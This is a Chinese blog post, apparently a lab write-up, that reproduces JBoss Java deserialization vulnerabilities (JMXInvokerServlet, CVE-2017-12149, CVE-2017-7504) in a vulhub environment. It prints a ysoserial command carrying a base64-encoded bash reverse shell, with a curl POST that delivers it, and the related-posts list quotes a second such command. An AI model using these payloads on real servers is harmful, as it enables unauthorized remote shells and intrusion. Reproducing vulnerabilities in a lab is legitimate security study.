中间件漏洞 -- JBoss

最新推荐文章于 2024-05-22 11:24:20 发布
最新推荐文章于 2024-05-22 11:24:20 发布
阅读量4.2k 收藏 3
点赞数 1
分类专栏: 漏洞 文章标签: 安全 中间件 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44769042/article/details/121378799
版权

中间件漏洞记录--5

        jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1EJB 2.0EJB3的规范。但JBoss核心服务不包括支持servlet/JSPWEB容器,一般与TomcatJetty绑定使用。
默认端口:8080,9990

目录

一、JBoss JMXInvokerServlet 反序列化漏洞

1、环境搭建:docker + vulhub

2、访问,搭建成功

3、 访问 /invoker/JMXInvokerServlet

4、本来想用工具,结果一堆乱码,看不懂

5、配置安装ysoserial

6、开始攻击

1> base64加密

2> 生成exp.ser

3> 使用POST将其传过去

4> 提前监听,getshell

二、 JBoss EJBInvokerServlet 反序列化漏洞 

三、JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

 四、JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

一、JBoss JMXInvokerServlet 反序列化漏洞

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

1、环境搭建:docker + vulhub

cd vulhub/jboss/JMXInvokerServlet-deserialization
docker-compose up -d

2、访问,搭建成功

3、 访问 /invoker/JMXInvokerServlet

 返回如下,说明接口开放,此接口存在反序列化漏洞。

4、本来想用工具,结果一堆乱码,看不懂

5、配置安装ysoserial

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests

在执行最后一步时,如果出现bash: mvn: command not found的问题,是因为kali未安装maven时出错的话,参考下面这个

kali安装maven和jdk、解决:bash: mvn: command not found_召唤大白的博客-CSDN博客

安装了五个小时,总算是成功了

6、开始攻击

1> base64加密

2> 生成exp.ser

看好路径

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyOS4yMjUvNjY2NiAwPiYx}|{base64,-d}|{bash,-i} " >exp.ser

3> 使用POST将其传过去

curl http://192.168.129.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

4> 提前监听,getshell

二、 JBoss EJBInvokerServlet 反序列化漏洞 

访问 /invoker/EJBInvokerServlet

返回如下,说明接口开放,此接口存在反序列化漏洞

复现同上 

三、JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

        该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

访问 /invoker/readonly

该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:

复现就同上,都是经典的java反序列化操作 

 

 四、JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,我们借助ysoserial,同一。

木剑温小二丶
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3318
ysoserial这款工具,堪称为“java反序列利用神器”。
JBoss中间件漏洞总结1
08-03
为了保护系统免受JBoss中间件漏洞的影响,管理员应: 1. **保持更新**:及时升级到最新的JBoss版本,获取安全更新。 2. **安全配置**:正确配置EJB、JMX和其他服务,避免不必要的暴露。 3. **访问控制**:实施严格...
【JAVA反序列扫描工具】简介、下载、安装、使用
04-22 5003
【反序列扫描工具】
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1039
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
ysoserial下载和使用
最新发布
c0529的博客
05-22 340
因为要用java打开jar格式的,所以如果下的是源文件,还需要打包,我试了试,我这个报错了,我也不知道哪里有问题。如果不报错可以自己试试打包的工作,说不定以后还有用到。所以我的建议是直接下载jar版本的。然后直接用java去运行就可以了。网址拖到下面就可以直接下载。
验证php的远程命令执行漏洞案例
Websec
09-17 2780
比如验证JBoss EJBInvokerServlet Marshalled Object RCE(CVE-2013-4810 ) 0x01:首先我们开启php的环境,如phpStudy,wamp等等,这里我们就使用phpStudy吧,进入php-5.5.38的目录(当前使用的这个php版本),将我们的test.php复制到这个目录即可  0x02:然后使用命令行进行验证即可,我们先进入到...
网络安全之反序列化漏洞复现
kali_Ma的博客
11-22 2353
Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service(中心认证服务),是一个单点登录协议,Apereo CAS是实现该协议的软件包。单点登录定义单点登录(Single sign on),英文名称缩写SSO,SSO的意思就是在多系统的环境中,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。
jboss-eap-7.2.6-patch
09-22
- `jboss-eap-7.2.6.CP`: 这是 JBoss EAP 7.2.6 的累积补丁,它整合了从 7.2.1 到 7.2.5 的所有 GA 补丁,并可能额外包含其他修复或改进。 3. **应用补丁的过程** 应用 JBoss EAP 补丁通常涉及以下步骤: - 验证...
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
015-jboss.pptx
10-22
JBoss中间件安全JBoss是一款知名的开源Java应用服务器,它遵循J2EE规范,主要用于管理和运行EJB(Enterprise JavaBeans)。由于其免费、开放源代码的特性,以及对J2EE标准的全面支持,JBoss在企业级应用中得到...
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
ysoserial反序列工具包
04-19
ysoserial反序列工具包,个人觉得还是很好利用 Java rmi 基本还很顺手
ysoserial下载
12-26
java反序列化漏洞检测工具,可以自动生成playload,测试用的 有需要的同学拿去用
dotnet-ysoserialnet用于各种NET格式化器的反序列化有效负载生成器
08-15
ysoserial.net 用于各种.NET格式化器的反序列化有效负载生成器
ysoserial,用于生成利用不安全Java对象反序列化的有效负载的概念验证工具。.zip
10-13
用于生成利用不安全Java对象反序列化的有效负载的概念验证工具。
ysoserial.net:用于各种.NET格式化程序的反序列化有效负载生成器
05-12
一种概念证明工具,用于生成利用不安全的.NET对象反序列化的有效负载。 描述 ysoserial.net是在通用.NET库中发现的实用程序和面向属性的编程“小工具链”的集合,可以在适当的条件下利用.NET应用程序执行对象的不安全反序列化。 主驱动程序接受用户指定的命令,并将其包装在用户指定的小工具链中,然后将这些对象序列化为stdout。 当在类路径上具有必需小工具的应用程序不安全地反序列化此数据时,该链将自动被调用并导致命令在应用程序主机上执行。 应该注意的是,漏洞在于应用程序执行不安全的反序列化,而不是在类路径上具有小工具。 该项目的灵感来自 免责声明 该软件的创建纯粹是为了学术研究和有效防御技术的发展,除非明确授权,否则不得将其用于攻击系统。 项目维护者对软件的滥用不承担任何责任。 负责任地使用。 该软件是一个个人项目,与任何公司都没有关系,包括项目所有者和贡献者的雇主。 安装
JBoss 中间件漏洞
qq_53742230的博客
07-11 1148
JBoss 中间件漏洞复现
JBOSS反序列化漏洞
weixin_52206305的博客
07-05 3895
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss反序列化漏洞JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞漏洞出现在/invoker/rea
【转载】ysoserial反序列化工具打包jar文件流程
mingyqf的博客
03-30 1822
ysoserial反序列化工具打包jar文件流程 [Fighter安全团队](javascript:void(0)😉 2021-01-31 22:28 00 — *前言* 身边很多朋友都不懂怎么将源码项目打包成jar文件,那么接着上一篇的环境就简单讲讲jar的打包流程,毕竟在github上有些项目都不是打包好的。这里以ysoserial为例,项目下载地址:https://codeload.github.com/frohoff/ysoserial/zip/master 01 — *idea打包jar * 导入
中间件漏洞详解:Tomcat、Weblogic、Nginx、JBOSS安全总结
“常见中间件漏洞总结PPT,涵盖了包括Tomcat、Weblogic、Nginx、IIS、Jboss在内的多种中间件的常见安全漏洞和相关知识,适合培训和学习。” 在IT行业中,中间件扮演着至关重要的角色,它是一种介于操作系统和应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值